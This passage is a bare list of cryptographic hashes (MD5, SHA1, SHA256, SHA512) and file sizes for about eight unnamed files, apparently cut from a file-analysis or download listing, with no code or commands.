  MD5: 9b56fdd900dee2f4d0a85b68ce470270
  SHA1: b48c1271d6badd971a61b19810fb7c8e072269cf
  SHA256: 8a06028deda4b8e46377119289c532246cd6000cdcf6ba7e9afff24aed3fa4cf
  SHA512: c52faad6aa2f9e2ddb3c91df9c4bcdde3c014e25640c0a4ac5b8f1f78d250b3e874c9ae3b751c070b1d806123c13e76c8145062b40e20dd456e8ece2ab4284a1
- Filesize: 202KB
  MD5: ba84dd4e0c1408828ccc1de09f585eda
  SHA1: e8e10065d479f8f591b9885ea8487bc673301298
  SHA256: 3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852
  SHA512: 7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290
- Filesize: 192KB
  MD5: 3724f06f3422f4e42b41e23acb39b152
  SHA1: 1220987627782d3c3397d4abf01ac3777999e01c
  SHA256: ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f
  SHA512: 509d9a32179a700ad76471b4cd094b8eb6d5d4ae7ad15b20fd76c482ed6d68f44693fc36bcb3999da9346ae9e43375cd8fe02b61edeabe4e78c4e2e44bf71d42
- Filesize: 758KB
  MD5: afd936e441bf5cbdb858e96833cc6ed3
  SHA1: 3491edd8c7caf9ae169e21fb58bccd29d95aefef
  SHA256: c6491d7a6d70c7c51baca7436464667b4894e4989fa7c5e05068dde4699e1cbf
  SHA512: 928c15a1eda602b2a66a53734f3f563ab9626882104e30ee2bf5106cfd6e08ec54f96e3063f1ab89bf13be2c8822a8419f5d8ee0a3583a4c479785226051a325
- Filesize: 172KB
  MD5: 5ef88919012e4a3d8a1e2955dc8c8d81
  SHA1: c0cfb830b8f1d990e3836e0bcc786e7972c9ed62
  SHA256: 3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d
  SHA512: 4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684
- Filesize: 536KB
  MD5: 14e7489ffebbb5a2ea500f796d881ad9
  SHA1: 0323ee0e1faa4aa0e33fb6c6147290aa71637ebd
  SHA256: a2e9752de49d18e885cbd61b29905983d44b4bc0379a244bfabdaa3188c01f0a
  SHA512: 2110113240b7d803d8271139e0a2439dbc86ae8719ecd8b132bbda2520f22dc3f169598c8e966ac9c0a40e617219cb8fe8aac674904f6a1ae92d4ac1e20627cd
- Filesize: 11KB
  MD5: 73a24164d8408254b77f3a2c57a22ab4
  SHA1: ea0215721f66a93d67019d11c4e588a547cc2ad6
  SHA256: d727a640723d192aa3ece213a173381682041cb28d8bd71781524dbae3ddbf62
  SHA512: 650d4320d9246aaecd596ac8b540bf7612ec7a8f60ecaa6e9c27b547b751386222ab926d0c915698d0bb20556475da507895981c072852804f0b42fdda02b844
- Filesize: 1.6MB
  MD5: 9ad3964ba3ad24c42c567e47f88c82b2
  SHA1: 6b4b581fc4e3ecb91b24ec601daa0594106bcc5d
  SHA256: 84a09ed81afc5ff9a17f81763c044c82a2d9e26f852de528112153ee9ab041d0
  SHA512: ce557a89c0fe6de59046116c1e262a36bbc3d561a91e44dcda022bef72cb75742c8b01bedcc5b9b999e07d8de1f94c665dd85d277e981b27b6bfebeaf9e58097